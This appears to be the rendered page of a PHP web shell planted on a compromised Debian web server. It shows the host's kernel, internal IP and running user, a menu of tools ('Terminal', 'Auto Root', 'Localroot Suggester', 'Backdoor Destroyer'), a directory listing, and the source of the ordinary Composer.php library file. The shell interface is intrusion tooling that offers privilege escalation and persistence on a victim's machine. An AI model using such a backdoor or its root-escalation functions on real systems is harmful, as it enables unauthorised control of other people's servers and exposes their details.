Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
php /
Composer /
Delete
Unzip
Name
Size
Permission
Date
Action
Advisory
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Autoload
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
CaBundle
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
ClassMapGenerator
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
Command
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Config
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Console
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
DependencyResolver
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Downloader
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
EventDispatcher
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Exception
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Filter
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
IO
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Installer
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Json
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
MetadataMinifier
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
PHPStan
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Package
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Pcre
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
Platform
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Plugin
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Question
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Repository
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Script
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
SelfUpdate
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Semver
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
Spdx
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
Util
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
XdebugHandler
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
Cache.php
11.05
KB
-rw-r--r--
2023-03-21 10:50
Composer.php
4.14
KB
-rw-r--r--
2023-03-21 10:50
Config.php
22.88
KB
-rw-r--r--
2023-03-21 10:50
Factory.php
31.11
KB
-rw-r--r--
2026-05-14 09:28
InstalledVersions.php
15.76
KB
-rw-r--r--
2023-03-21 10:50
Installer.php
53.36
KB
-rw-r--r--
2023-03-21 10:50
PartialComposer.php
2.3
KB
-rw-r--r--
2023-03-21 10:50
autoload.php
26.88
KB
-rw-r--r--
2026-05-14 09:28
Save
Rename
<?php declare(strict_types=1); /* * This file is part of Composer. * * (c) Nils Adermann <naderman@naderman.de> * Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Composer; use Composer\Package\Locker; use Composer\Pcre\Preg; use Composer\Plugin\PluginManager; use Composer\Downloader\DownloadManager; use Composer\Autoload\AutoloadGenerator; use Composer\Package\Archiver\ArchiveManager; /** * @author Jordi Boggiano <j.boggiano@seld.be> * @author Konstantin Kudryashiv <ever.zet@gmail.com> * @author Nils Adermann <naderman@naderman.de> */ class Composer extends PartialComposer { /* * Examples of the following constants in the various configurations they can be in * * You are probably better off using Composer::getVersion() though as that will always return something usable * * releases (phar): * const VERSION = '1.8.2'; * const BRANCH_ALIAS_VERSION = ''; * const RELEASE_DATE = '2019-01-29 15:00:53'; * const SOURCE_VERSION = ''; * * snapshot builds (phar): * const VERSION = 'd3873a05650e168251067d9648845c220c50e2d7'; * const BRANCH_ALIAS_VERSION = '1.9-dev'; * const RELEASE_DATE = '2019-02-20 07:43:56'; * const SOURCE_VERSION = ''; * * source (git clone): * const VERSION = '@package_version@'; * const BRANCH_ALIAS_VERSION = '@package_branch_alias_version@'; * const RELEASE_DATE = '@release_date@'; * const SOURCE_VERSION = '1.8-dev+source'; * * @see getVersion() */ public const VERSION = '2.5.5'; public const BRANCH_ALIAS_VERSION = ''; public const RELEASE_DATE = '2023-03-21 11:50:05'; public const SOURCE_VERSION = ''; /** * Version number of the internal composer-runtime-api package * * This is used to version features available to projects at runtime * like the platform-check file, the Composer\InstalledVersions class * and possibly others in the future. * * @var string */ public const RUNTIME_API_VERSION = '2.2.2'; public static function getVersion(): string { // no replacement done, this must be a source checkout if (self::VERSION === '@package_version'.'@') { return self::SOURCE_VERSION; } // we have a branch alias and version is a commit id, this must be a snapshot build if (self::BRANCH_ALIAS_VERSION !== '' && Preg::isMatch('{^[a-f0-9]{40}$}', self::VERSION)) { return self::BRANCH_ALIAS_VERSION.'+'.self::VERSION; } return self::VERSION; } /** * @var Locker */ private $locker; /** * @var Downloader\DownloadManager */ private $downloadManager; /** * @var Plugin\PluginManager */ private $pluginManager; /** * @var Autoload\AutoloadGenerator */ private $autoloadGenerator; /** * @var ArchiveManager */ private $archiveManager; public function setLocker(Locker $locker): void { $this->locker = $locker; } public function getLocker(): Locker { return $this->locker; } public function setDownloadManager(DownloadManager $manager): void { $this->downloadManager = $manager; } public function getDownloadManager(): DownloadManager { return $this->downloadManager; } public function setArchiveManager(ArchiveManager $manager): void { $this->archiveManager = $manager; } public function getArchiveManager(): ArchiveManager { return $this->archiveManager; } public function setPluginManager(PluginManager $manager): void { $this->pluginManager = $manager; } public function getPluginManager(): PluginManager { return $this->pluginManager; } public function setAutoloadGenerator(AutoloadGenerator $autoloadGenerator): void { $this->autoloadGenerator = $autoloadGenerator; } public function getAutoloadGenerator(): AutoloadGenerator { return $this->autoloadGenerator; } }